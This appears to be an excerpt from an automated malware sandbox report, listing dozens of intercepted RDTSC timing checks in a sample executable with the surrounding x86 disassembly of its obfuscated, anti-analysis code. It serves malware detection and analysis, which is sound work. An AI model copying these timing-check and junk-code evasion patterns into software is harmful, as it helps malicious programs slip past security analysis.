Source: C:\Users\user\Desktop\u25XzKsRuY.exe RDTSC instruction interceptor: First address: 136D19F second address: 136D226 instructions: 0x00000000 rdtsc 0x00000002 jne 00007FF6D0B6481Ch 0x00000008 pop edx 0x00000009 pop eax 0x0000000a nop 0x0000000b jmp 00007FF6D0B6481Fh 0x00000010 push 00000000h 0x00000012 push 00000000h 0x00000014 push esi 0x00000015 call 00007FF6D0B64818h 0x0000001a pop esi 0x0000001b mov dword ptr [esp+04h], esi 0x0000001f add dword ptr [esp+04h], 0000001Bh 0x00000027 inc esi 0x00000028 push esi 0x00000029 ret 0x0000002a pop esi 0x0000002b ret 0x0000002c jmp 00007FF6D0B64828h 0x00000031 xor dword ptr [ebp+122D1D71h], eax 0x00000037 push 00000000h 0x00000039 sub dword ptr [ebp+1246B55Ch], esi 0x0000003f xchg eax, esi 0x00000040 push eax 0x00000041 push edx 0x00000042 jmp 00007FF6D0B64829h 0x00000047 rdtsc
Source: C:\Users\user\Desktop\u25XzKsRuY.exe RDTSC instruction interceptor: First address: 136D226 second address: 136D22C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\u25XzKsRuY.exe RDTSC instruction interceptor: First address: 136F301 second address: 136F358 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 jbe 00007FF6D0B6481Ch 0x0000000b popad 0x0000000c mov dword ptr [esp], eax 0x0000000f push 00000000h 0x00000011 push edx 0x00000012 call 00007FF6D0B64818h 0x00000017 pop edx 0x00000018 mov dword ptr [esp+04h], edx 0x0000001c add dword ptr [esp+04h], 00000019h 0x00000024 inc edx 0x00000025 push edx 0x00000026 ret 0x00000027 pop edx 0x00000028 ret 0x00000029 sub ebx, dword ptr [ebp+122D2374h] 0x0000002f push 00000000h 0x00000031 mov dword ptr [ebp+122D1CC1h], edi 0x00000037 push 00000000h 0x00000039 xchg eax, esi 0x0000003a push eax 0x0000003b push edx 0x0000003c pushad 0x0000003d ja 00007FF6D0B64816h 0x00000043 je 00007FF6D0B64816h 0x00000049 popad 0x0000004a rdtsc
Source: C:\Users\user\Desktop\u25XzKsRuY.exe RDTSC instruction interceptor: First address: 136F358 second address: 136F36F instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 jg 00007FF6D0B95BE6h 0x00000009 pop edi 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push eax 0x0000000e push edx 0x0000000f jnp 00007FF6D0B95BE8h 0x00000015 pushad 0x00000016 popad 0x00000017 rdtsc
Source: C:\Users\user\Desktop\u25XzKsRuY.exe RDTSC instruction interceptor: First address: 1370260 second address: 13702BF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jg 00007FF6D0B64816h 0x0000000a popad 0x0000000b nop 0x0000000c cmc 0x0000000d add edi, dword ptr [ebp+12469A9Fh] 0x00000013 push 00000000h 0x00000015 push 00000000h 0x00000017 push eax 0x00000018 call 00007FF6D0B64818h 0x0000001d pop eax 0x0000001e mov dword ptr [esp+04h], eax 0x00000022 add dword ptr [esp+04h], 00000015h 0x0000002a inc eax 0x0000002b push eax 0x0000002c ret 0x0000002d pop eax 0x0000002e ret 0x0000002f sub dword ptr [ebp+122D2F0Fh], esi 0x00000035 push 00000000h 0x00000037 push 00000000h 0x00000039 push esi 0x0000003a call 00007FF6D0B64818h 0x0000003f pop esi 0x00000040 mov dword ptr [esp+04h], esi 0x00000044 add dword ptr [esp+04h], 00000014h 0x0000004c inc esi 0x0000004d push esi 0x0000004e ret 0x0000004f pop esi 0x00000050 ret 0x00000051 push ebx 0x00000052 pop ebx 0x00000053 push eax 0x00000054 push eax 0x00000055 push edx 0x00000056 push ebx 0x00000057 push ecx 0x00000058 pop ecx 0x00000059 pop ebx 0x0000005a rdtsc
Source: C:\Users\user\Desktop\u25XzKsRuY.exe RDTSC instruction interceptor: First address: 13702BF second address: 13702C5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\u25XzKsRuY.exe RDTSC instruction interceptor: First address: 1371546 second address: 1371550 instructions: 0x00000000 rdtsc 0x00000002 js 00007FF6D0B64816h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\Desktop\u25XzKsRuY.exe RDTSC instruction interceptor: First address: 1371550 second address: 1371556 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\u25XzKsRuY.exe RDTSC instruction interceptor: First address: 13724C3 second address: 13724C7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\u25XzKsRuY.exe RDTSC instruction interceptor: First address: 1371556 second address: 137155A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\u25XzKsRuY.exe RDTSC instruction interceptor: First address: 13724C7 second address: 13724D5 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 je 00007FF6D0B64816h 0x0000000e rdtsc
Source: C:\Users\user\Desktop\u25XzKsRuY.exe RDTSC instruction interceptor: First address: 13724D5 second address: 1372568 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 mov dword ptr [esp], eax 0x0000000a push 00000000h 0x0000000c push ebp 0x0000000d call 00007FF6D0B95BE8h 0x00000012 pop ebp 0x00000013 mov dword ptr [esp+04h], ebp 0x00000017 add dword ptr [esp+04h], 00000014h 0x0000001f inc ebp 0x00000020 push ebp 0x00000021 ret 0x00000022 pop ebp 0x00000023 ret 0x00000024 push dword ptr fs:[00000000h] 0x0000002b sbb di, 99D8h 0x00000030 mov dword ptr fs:[00000000h], esp 0x00000037 mov dword ptr [ebp+12469C3Ch], edx 0x0000003d mov bh, al 0x0000003f mov eax, dword ptr [ebp+122D1669h] 0x00000045 movsx edi, dx 0x00000048 push FFFFFFFFh 0x0000004a push 00000000h 0x0000004c push ebp 0x0000004d call 00007FF6D0B95BE8h 0x00000052 pop ebp 0x00000053 mov dword ptr [esp+04h], ebp 0x00000057 add dword ptr [esp+04h], 0000001Bh 0x0000005f inc ebp 0x00000060 push ebp 0x00000061 ret 0x00000062 pop ebp 0x00000063 ret 0x00000064 mov ebx, 2244362Fh 0x00000069 jmp 00007FF6D0B95BEFh 0x0000006e mov ebx, dword ptr [ebp+122D2955h] 0x00000074 nop 0x00000075 push esi 0x00000076 jo 00007FF6D0B95BECh 0x0000007c push eax 0x0000007d push edx 0x0000007e rdtsc
Source: C:\Users\user\Desktop\u25XzKsRuY.exe RDTSC instruction interceptor: First address: 1377442 second address: 1377446 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\u25XzKsRuY.exe RDTSC instruction interceptor: First address: 1376715 second address: 1376719 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\u25XzKsRuY.exe RDTSC instruction interceptor: First address: 1377446 second address: 137744C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\u25XzKsRuY.exe RDTSC instruction interceptor: First address: 137744C second address: 13774E8 instructions: 0x00000000 rdtsc 0x00000002 jl 00007FF6D0B95BE8h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a mov dword ptr [esp], eax 0x0000000d push 00000000h 0x0000000f push ebx 0x00000010 call 00007FF6D0B95BE8h 0x00000015 pop ebx 0x00000016 mov dword ptr [esp+04h], ebx 0x0000001a add dword ptr [esp+04h], 00000017h 0x00000022 inc ebx 0x00000023 push ebx 0x00000024 ret 0x00000025 pop ebx 0x00000026 ret 0x00000027 jmp 00007FF6D0B95BECh 0x0000002c mov edi, dword ptr [ebp+122D1C97h] 0x00000032 mov bl, D3h 0x00000034 push 00000000h 0x00000036 push 00000000h 0x00000038 push eax 0x00000039 call 00007FF6D0B95BE8h 0x0000003e pop eax 0x0000003f mov dword ptr [esp+04h], eax 0x00000043 add dword ptr [esp+04h], 00000015h 0x0000004b inc eax 0x0000004c push eax 0x0000004d ret 0x0000004e pop eax 0x0000004f ret 0x00000050 jg 00007FF6D0B95BEAh 0x00000056 push 00000000h 0x00000058 add dword ptr [ebp+122D38ECh], ecx 0x0000005e jmp 00007FF6D0B95BEEh 0x00000063 xchg eax, esi 0x00000064 jmp 00007FF6D0B95BF5h 0x00000069 push eax 0x0000006a pushad 0x0000006b push ebx 0x0000006c push eax 0x0000006d push edx 0x0000006e rdtsc
Source: C:\Users\user\Desktop\u25XzKsRuY.exe RDTSC instruction interceptor: First address: 13785BB second address: 13785C1 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\u25XzKsRuY.exe RDTSC instruction interceptor: First address: 13785C1 second address: 13785C6 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\u25XzKsRuY.exe RDTSC instruction interceptor: First address: 137A52A second address: 137A52E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\u25XzKsRuY.exe RDTSC instruction interceptor: First address: 137C43A second address: 137C43E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\u25XzKsRuY.exe RDTSC instruction interceptor: First address: 137C43E second address: 137C4B8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 jmp 00007FF6D0B64828h 0x0000000c jmp 00007FF6D0B64829h 0x00000011 popad 0x00000012 popad 0x00000013 nop 0x00000014 push 00000000h 0x00000016 push esi 0x00000017 call 00007FF6D0B64818h 0x0000001c pop esi 0x0000001d mov dword ptr [esp+04h], esi 0x00000021 add dword ptr [esp+04h], 0000001Ch 0x00000029 inc esi 0x0000002a push esi 0x0000002b ret 0x0000002c pop esi 0x0000002d ret 0x0000002e push 00000000h 0x00000030 add edi, dword ptr [ebp+122D1E4Ah] 0x00000036 push 00000000h 0x00000038 sub edi, dword ptr [ebp+122D2304h] 0x0000003e xchg eax, esi 0x0000003f push eax 0x00000040 push edx 0x00000041 push ecx 0x00000042 je 00007FF6D0B64816h 0x00000048 pop ecx 0x00000049 rdtsc
Source: C:\Users\user\Desktop\u25XzKsRuY.exe RDTSC instruction interceptor: First address: 137E6B8 second address: 137E6D1 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jmp 00007FF6D0B95BEDh 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e popad 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
Source: C:\Users\user\Desktop\u25XzKsRuY.exe RDTSC instruction interceptor: First address: 137E6D1 second address: 137E6D5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\u25XzKsRuY.exe RDTSC instruction interceptor: First address: 137C659 second address: 137C66B instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF6D0B95BEAh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\u25XzKsRuY.exe RDTSC instruction interceptor: First address: 137C66B second address: 137C66F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\u25XzKsRuY.exe RDTSC instruction interceptor: First address: 13851B4 second address: 13851EA instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 ja 00007FF6D0B95BE6h 0x00000009 push edx 0x0000000a pop edx 0x0000000b pop edx 0x0000000c pushad 0x0000000d push esi 0x0000000e pop esi 0x0000000f jmp 00007FF6D0B95BF5h 0x00000014 popad 0x00000015 pop edx 0x00000016 pop eax 0x00000017 pushad 0x00000018 push eax 0x00000019 push edx 0x0000001a jmp 00007FF6D0B95BEAh 0x0000001f push ecx 0x00000020 pop ecx 0x00000021 rdtsc
Source: C:\Users\user\Desktop\u25XzKsRuY.exe RDTSC instruction interceptor: First address: 13851EA second address: 13851EE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\u25XzKsRuY.exe RDTSC instruction interceptor: First address: 13851EE second address: 13851F7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\u25XzKsRuY.exe RDTSC instruction interceptor: First address: 13851F7 second address: 138521D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 jmp 00007FF6D0B6481Dh 0x0000000b popad 0x0000000c jng 00007FF6D0B64818h 0x00000012 pushad 0x00000013 popad 0x00000014 push eax 0x00000015 push edx 0x00000016 jnl 00007FF6D0B64816h 0x0000001c push esi 0x0000001d pop esi 0x0000001e rdtsc
Source: C:\Users\user\Desktop\u25XzKsRuY.exe RDTSC instruction interceptor: First address: 138876E second address: 1388773 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\u25XzKsRuY.exe RDTSC instruction interceptor: First address: 138C218 second address: 138C22B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FF6D0B6481Ah 0x00000009 popad 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d popad 0x0000000e rdtsc
Source: C:\Users\user\Desktop\u25XzKsRuY.exe RDTSC instruction interceptor: First address: 138C301 second address: 138C312 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop ebx 0x00000007 mov dword ptr [esp+04h], eax 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f pushad 0x00000010 popad 0x00000011 rdtsc
Source: C:\Users\user\Desktop\u25XzKsRuY.exe RDTSC instruction interceptor: First address: 138C312 second address: 138C318 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\u25XzKsRuY.exe RDTSC instruction interceptor: First address: 138C48B second address: 138C491 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\u25XzKsRuY.exe RDTSC instruction interceptor: First address: 138C491 second address: 138C4AE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jmp 00007FF6D0B64820h 0x0000000a popad 0x0000000b mov eax, dword ptr [eax] 0x0000000d push eax 0x0000000e push eax 0x0000000f push edx 0x00000010 push ebx 0x00000011 pop ebx 0x00000012 rdtsc
Source: C:\Users\user\Desktop\u25XzKsRuY.exe RDTSC instruction interceptor: First address: 138C4AE second address: 138C4D0 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop eax 0x00000007 mov dword ptr [esp+04h], eax 0x0000000b push eax 0x0000000c push edx 0x0000000d jmp 00007FF6D0B95BF5h 0x00000012 rdtsc
Source: C:\Users\user\Desktop\u25XzKsRuY.exe RDTSC instruction interceptor: First address: 138C4D0 second address: 138C4D6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push edx 0x00000005 pop edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\u25XzKsRuY.exe RDTSC instruction interceptor: First address: 1392B08 second address: 1392B10 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 pushad 0x00000007 popad 0x00000008 rdtsc
Source: C:\Users\user\Desktop\u25XzKsRuY.exe RDTSC instruction interceptor: First address: 1392B10 second address: 1392B26 instructions: 0x00000000 rdtsc 0x00000002 jp 00007FF6D0B64816h 0x00000008 pushad 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push edx 0x0000000e push edx 0x0000000f pop edx 0x00000010 jp 00007FF6D0B64816h 0x00000016 rdtsc
Source: C:\Users\user\Desktop\u25XzKsRuY.exe RDTSC instruction interceptor: First address: 1392F20 second address: 1392F45 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jno 00007FF6D0B95BE6h 0x0000000a pop ebx 0x0000000b pushad 0x0000000c jns 00007FF6D0B95BE6h 0x00000012 push eax 0x00000013 pop eax 0x00000014 jmp 00007FF6D0B95BEEh 0x00000019 push ebx 0x0000001a pop ebx 0x0000001b popad 0x0000001c rdtsc
Source: C:\Users\user\Desktop\u25XzKsRuY.exe RDTSC instruction interceptor: First address: 139339D second address: 13933A1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\u25XzKsRuY.exe RDTSC instruction interceptor: First address: 13936BF second address: 13936C7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 pushad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\u25XzKsRuY.exe RDTSC instruction interceptor: First address: 1394E57 second address: 1394E5D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\u25XzKsRuY.exe RDTSC instruction interceptor: First address: 1394E5D second address: 1394E6E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnl 00007FF6D0B95BE6h 0x0000000a jp 00007FF6D0B95BE6h 0x00000010 popad 0x00000011 rdtsc
Source: C:\Users\user\Desktop\u25XzKsRuY.exe RDTSC instruction interceptor: First address: 13987CA second address: 13987DE instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jc 00007FF6D0B6481Eh 0x0000000c push ebx 0x0000000d pop ebx 0x0000000e jne 00007FF6D0B64816h 0x00000014 rdtsc
Source: C:\Users\user\Desktop\u25XzKsRuY.exe RDTSC instruction interceptor: First address: 13987DE second address: 13987E8 instructions: 0x00000000 rdtsc 0x00000002 jl 00007FF6D0B95C00h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\u25XzKsRuY.exe RDTSC instruction interceptor: First address: 136B0ED second address: 13498C8 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF6D0B6481Dh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 nop 0x0000000a push 00000000h 0x0000000c push esi 0x0000000d call 00007FF6D0B64818h 0x00000012 pop esi 0x00000013 mov dword ptr [esp+04h], esi 0x00000017 add dword ptr [esp+04h], 00000018h 0x0000001f inc esi 0x00000020 push esi 0x00000021 ret 0x00000022 pop esi 0x00000023 ret 0x00000024 pushad 0x00000025 mov dword ptr [ebp+122D379Fh], ebx 0x0000002b mov dx, si 0x0000002e popad 0x0000002f call dword ptr [ebp+122D18E1h] 0x00000035 push eax 0x00000036 push edx 0x00000037 jmp 00007FF6D0B6481Fh 0x0000003c push eax 0x0000003d push edx 0x0000003e pushad 0x0000003f popad 0x00000040 rdtsc
Source: C:\Users\user\Desktop\u25XzKsRuY.exe RDTSC instruction interceptor: First address: 136B6C9 second address: 136B6CD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\u25XzKsRuY.exe RDTSC instruction interceptor: First address: 136B876 second address: 136B88F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FF6D0B64825h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\u25XzKsRuY.exe RDTSC instruction interceptor: First address: 136B90F second address: 136B916 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 popad 0x00000007 rdtsc
Source: C:\Users\user\Desktop\u25XzKsRuY.exe RDTSC instruction interceptor: First address: 136B916 second address: 136B957 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF6D0B64827h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a jmp 00007FF6D0B64821h 0x0000000f mov eax, dword ptr [esp+04h] 0x00000013 push eax 0x00000014 push edx 0x00000015 jmp 00007FF6D0B6481Eh 0x0000001a rdtsc
Source: C:\Users\user\Desktop\u25XzKsRuY.exe RDTSC instruction interceptor: First address: 136B957 second address: 136B996 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007FF6D0B95BF6h 0x00000008 pushad 0x00000009 popad 0x0000000a popad 0x0000000b pop edx 0x0000000c pop eax 0x0000000d mov eax, dword ptr [eax] 0x0000000f jmp 00007FF6D0B95BF5h 0x00000014 mov dword ptr [esp+04h], eax 0x00000018 push edi 0x00000019 pushad 0x0000001a pushad 0x0000001b popad 0x0000001c push eax 0x0000001d push edx 0x0000001e rdtsc
Source: C:\Users\user\Desktop\u25XzKsRuY.exe RDTSC instruction interceptor: First address: 136BA38 second address: 136BA3F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\Desktop\u25XzKsRuY.exe RDTSC instruction interceptor: First address: 136C032 second address: 136C074 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF6D0B95BF4h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 nop 0x0000000a sub ecx, 66F7D5ADh 0x00000010 push 0000001Eh 0x00000012 movsx edi, bx 0x00000015 nop 0x00000016 push esi 0x00000017 jnl 00007FF6D0B95BECh 0x0000001d jnl 00007FF6D0B95BE6h 0x00000023 pop esi 0x00000024 push eax 0x00000025 push eax 0x00000026 push edx 0x00000027 je 00007FF6D0B95BECh 0x0000002d jl 00007FF6D0B95BE6h 0x00000033 rdtsc
Source: C:\Users\user\Desktop\u25XzKsRuY.exe RDTSC instruction interceptor: First address: 136C4F7 second address: 136C4FC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\u25XzKsRuY.exe RDTSC instruction interceptor: First address: 136C4FC second address: 134A5B5 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF6D0B95BEDh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 nop 0x0000000a push 00000000h 0x0000000c push ecx 0x0000000d call 00007FF6D0B95BE8h 0x00000012 pop ecx 0x00000013 mov dword ptr [esp+04h], ecx 0x00000017 add dword ptr [esp+04h], 00000014h 0x0000001f inc ecx 0x00000020 push ecx 0x00000021 ret 0x00000022 pop ecx 0x00000023 ret 0x00000024 call dword ptr [ebp+122D1E36h] 0x0000002a push eax 0x0000002b push edx 0x0000002c jmp 00007FF6D0B95BF4h 0x00000031 rdtsc
Source: C:\Users\user\Desktop\u25XzKsRuY.exe RDTSC instruction interceptor: First address: 134A5B5 second address: 134A5C2 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jo 00007FF6D0B64816h 0x00000009 pushad 0x0000000a popad 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\u25XzKsRuY.exe RDTSC instruction interceptor: First address: 13F96CB second address: 13F96E7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 push ecx 0x00000008 pop ecx 0x00000009 jmp 00007FF6D0B64823h 0x0000000e rdtsc
Source: C:\Users\user\Desktop\u25XzKsRuY.exe RDTSC instruction interceptor: First address: 13FE424 second address: 13FE428 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\u25XzKsRuY.exe RDTSC instruction interceptor: First address: 1409A47 second address: 1409A71 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 ja 00007FF6D0B6482Ah 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f popad 0x00000010 jl 00007FF6D0B64816h 0x00000016 rdtsc
Source: C:\Users\user\Desktop\u25XzKsRuY.exe RDTSC instruction interceptor: First address: 1409A71 second address: 1409A8F instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF6D0B95BEAh 0x00000007 jp 00007FF6D0B95BE6h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f jnl 00007FF6D0B95BEEh 0x00000015 pushad 0x00000016 popad 0x00000017 push eax 0x00000018 push edx 0x00000019 rdtsc
Source: C:\Users\user\Desktop\u25XzKsRuY.exe RDTSC instruction interceptor: First address: 1409A8F second address: 1409AA8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 pushad 0x00000008 ja 00007FF6D0B64816h 0x0000000e jp 00007FF6D0B64816h 0x00000014 push edx 0x00000015 pop edx 0x00000016 push ebx 0x00000017 pop ebx 0x00000018 popad 0x00000019 rdtsc
Source: C:\Users\user\Desktop\u25XzKsRuY.exe RDTSC instruction interceptor: First address: 1409AA8 second address: 1409ABE instructions: 0x00000000 rdtsc 0x00000002 jp 00007FF6D0B95BEEh 0x00000008 push eax 0x00000009 push edx 0x0000000a push edx 0x0000000b pop edx 0x0000000c push esi 0x0000000d pop esi 0x0000000e rdtsc
Source: C:\Users\user\Desktop\u25XzKsRuY.exe RDTSC instruction interceptor: First address: 1409ABE second address: 1409AC2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\u25XzKsRuY.exe RDTSC instruction interceptor: First address: 14098C7 second address: 14098D4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 pushad 0x00000007 popad 0x00000008 popad 0x00000009 push eax 0x0000000a push edx 0x0000000b push esi 0x0000000c pop esi 0x0000000d rdtsc
Source: C:\Users\user\Desktop\u25XzKsRuY.exe RDTSC instruction interceptor: First address: 14098D4 second address: 14098E2 instructions: 0x00000000 rdtsc 0x00000002 jc 00007FF6D0B64816h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\u25XzKsRuY.exe RDTSC instruction interceptor: First address: 14098E2 second address: 14098E6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\u25XzKsRuY.exe RDTSC instruction interceptor: First address: 14098E6 second address: 14098EA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\u25XzKsRuY.exe RDTSC instruction interceptor: First address: 14111FA second address: 1411205 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 push edx 0x00000008 pop edx 0x00000009 push eax 0x0000000a pop eax 0x0000000b rdtsc
Source: C:\Users\user\Desktop\u25XzKsRuY.exe RDTSC instruction interceptor: First address: 1411205 second address: 1411211 instructions: 0x00000000 rdtsc 0x00000002 jg 00007FF6D0B64816h 0x00000008 push edx 0x00000009 pop edx 0x0000000a pop edx 0x0000000b pop eax 0x0000000c rdtsc
Source: C:\Users\user\Desktop\u25XzKsRuY.exe RDTSC instruction interceptor: First address: 1411211 second address: 1411217 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\u25XzKsRuY.exe RDTSC instruction interceptor: First address: 1411217 second address: 141121B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\u25XzKsRuY.exe RDTSC instruction interceptor: First address: 140FAB0 second address: 140FAB4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\u25XzKsRuY.exe RDTSC instruction interceptor: First address: 140FC07 second address: 140FC0B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
